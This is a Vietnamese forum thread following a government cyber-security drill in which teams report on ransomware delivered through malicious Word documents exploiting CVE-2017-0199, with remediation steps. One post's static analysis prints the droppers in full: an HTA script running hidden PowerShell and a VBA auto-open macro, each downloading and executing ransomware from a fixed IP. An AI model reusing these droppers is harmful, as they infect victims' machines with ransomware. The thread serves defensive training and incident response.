Tường thuật Diễn tập An ninh mạng WhiteHat Drill 04

xin anh hướng dẫn cách cấu hình firewall để chỉ mở duy nhất cổng remote (3389) và chặn các hướng đi vào (Inbound) từ Internet trên Firewall.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Đã vào được máy chủ. Chạy file Diễn tập ANM - 1.doc xong là máy trạm bị nhiễm Ransomware ngay. Kiểm tra trên Virustotal cho thấy file Diễn tập ANM - 1.doc là mã độc Ransomware tấn công sử dụng điểm yếu CVE-2017-0199. Mã độc được download tại đường dẫn http://118.70.80.143:4448/ransomware_tb.exe, http://118.70.80.143/getransomware.hta.
Cách thức xử lý: Chặn kết nối tới địa chỉ ip 118.70.80.143, Cập nhật patch cho CVE-2017-0199
Khôi phục dữ liệu: Kích chuột phải vào ổ C --> restore previous version--> chọn bản backup ngày 25/07 5:05PM -> Open --> Chọn các file dữ liệu cần khôi phục
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Vĩnh Long đã hoàn tất Phase 1. Các tập tin đã bị mã hóa
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
xin anh hướng dẫn cách cấu hình firewall để chỉ mở duy nhất cổng remote (3389) và chặn các hướng đi vào (Inbound) từ Internet trên Firewall.
BTC xin trả lời câu hỏi của bạn như sau: Mời bạn Google nhé :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Báo cáo Phase 1
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
upload_2017-7-26_14-31-56.png
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
qua phân tích ta thấy bị nhiễm virut
upload_2017-7-26_14-43-58.png
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cao Bằng ko truy cập đc máy ảo Mod ới
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Dính rồi
upload_2017-7-26_14-38-48.png
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Vĩnh Long đã check trên Virustotal, kết quả 29/57 đối với file1 và 10/57 đối với file2
Đồng thời đóng rules trên Firewall ngoại trừ port 3389 Inbound
Hoàn thành Phase 2
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Sở Thông tin và Truyền thông Phú Thọ báo cáo diễn tập ANM phase1
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Pha2: cách lý máy tính bị nhiễm, Mod kiểm tra lại file 2. qua check virus file 1 bị nhiễm: 29/57, file 2 bị nhiễm: 10/57.
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Trung tâm CNTT tỉnh Lạng sơn chưa có IP mới mod ơi...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Máy ảo quá chậm nên không thể phân tích Dynamic Analysis được.

Tiến hành phân tích tĩnh (Static Analysis) 2 file trên.
(1) File Doc 1:
B1:
remnux@remnux:~/Desktop/Malware/ANM$ rtfdump.py -s 13 -H -E -d D1.doc.bin | oledump.py -s 1
00000000: 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 A4 00 00 00 E0 C9 EA 79 ........�...���y
00000020: F9 BA CE 11 8C 82 00 AA 00 4B A9 0B 8C 00 00 00 ���.��.�.K�.�...
00000030: 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 31 00 h.t.t.p.:././.1.
00000040: 31 00 38 00 2E 00 37 00 30 00 2E 00 38 00 30 00 1.8...7.0...8.0.
00000050: 2E 00 31 00 34 00 33 00 2F 00 67 00 65 00 74 00 ..1.4.3./.g.e.t.
00000060: 72 00 61 00 6E 00 73 00 6F 00 6D 00 77 00 61 00 r.a.n.s.o.m.w.a.
00000070: 72 00 65 00 2E 00 68 00 74 00 61 00 00 00 00 00 r.e...h.t.a.....
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000A0: 00 00 00 00 79 58 81 F4 3B 1D 7F 48 AF 2C 82 5D ....yX��;.H�,�]
000000B0: C4 85 27 63 00 00 00 00 A5 AB 00 00 FF FF FF FF ą'c....��..����
000000C0: 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ........�......F
000000D0: 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ....����........
000000E0: 90 66 60 A6 37 B5 D2 01 00 00 00 00 00 00 00 00 �f`�7��.........

B2:
Có được đường link http://118.70.80.143/getransomware.hta, tải về với wget
wget http://118.70.80.143/getransomware.hta

B3:
Xem nội dung file getransomware.hta
remnux@remnux:~/Desktop/Malware/ANM$ cat getransomware.hta
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://118.70.80.143/ransomware.exe\', \'c:/windows/temp/ransomware.exe\'); c:/windows/temp/ransomware.exe', 0);window.close();
</script>

(2) File Doc 2:
B1:
remnux@remnux:~/Desktop/Malware/ANM$ olevba.py D2.doc.bin | more

Private Sub Document_Open()
Dim SourceName As String
Dim Destination As String
Dim R As Long

SourceName = "http://118.70.80.143:4448/ransomware_tb.exe"
Destination = "C:\Windows\Temp\ransomware.exe"
DeleteUrlCacheEntry (SourceName)
R = URLDownloadToFile(0&, SourceName, Destination, 0&, 0&)
If R = 0 Then
Call Shell(Destination, vbNormalFocus)
End If
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

(3) File ransomware.exe
B1: Tách Resource với Resource Hacker thì thấy file BitMap như các hình ở trên.

B2: Đọc String
.rdata:00411688 db 'c:\Users\ThuyND\Desktop\BkavRansomware\Ransomware\Release\Ransomw' ; PdbFileName
Dự đoán là con Ransomware này tự viết và compile với VC ++ ???

B3: Phần Import Table có nhiều API liên quan đến Crypto nhưng chưa thầy API liên quan đến kết nối ra ngoài. Kiểm tra trong các Hàm GetProcAddress cũng không thấy.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
[email protected]
Bên trên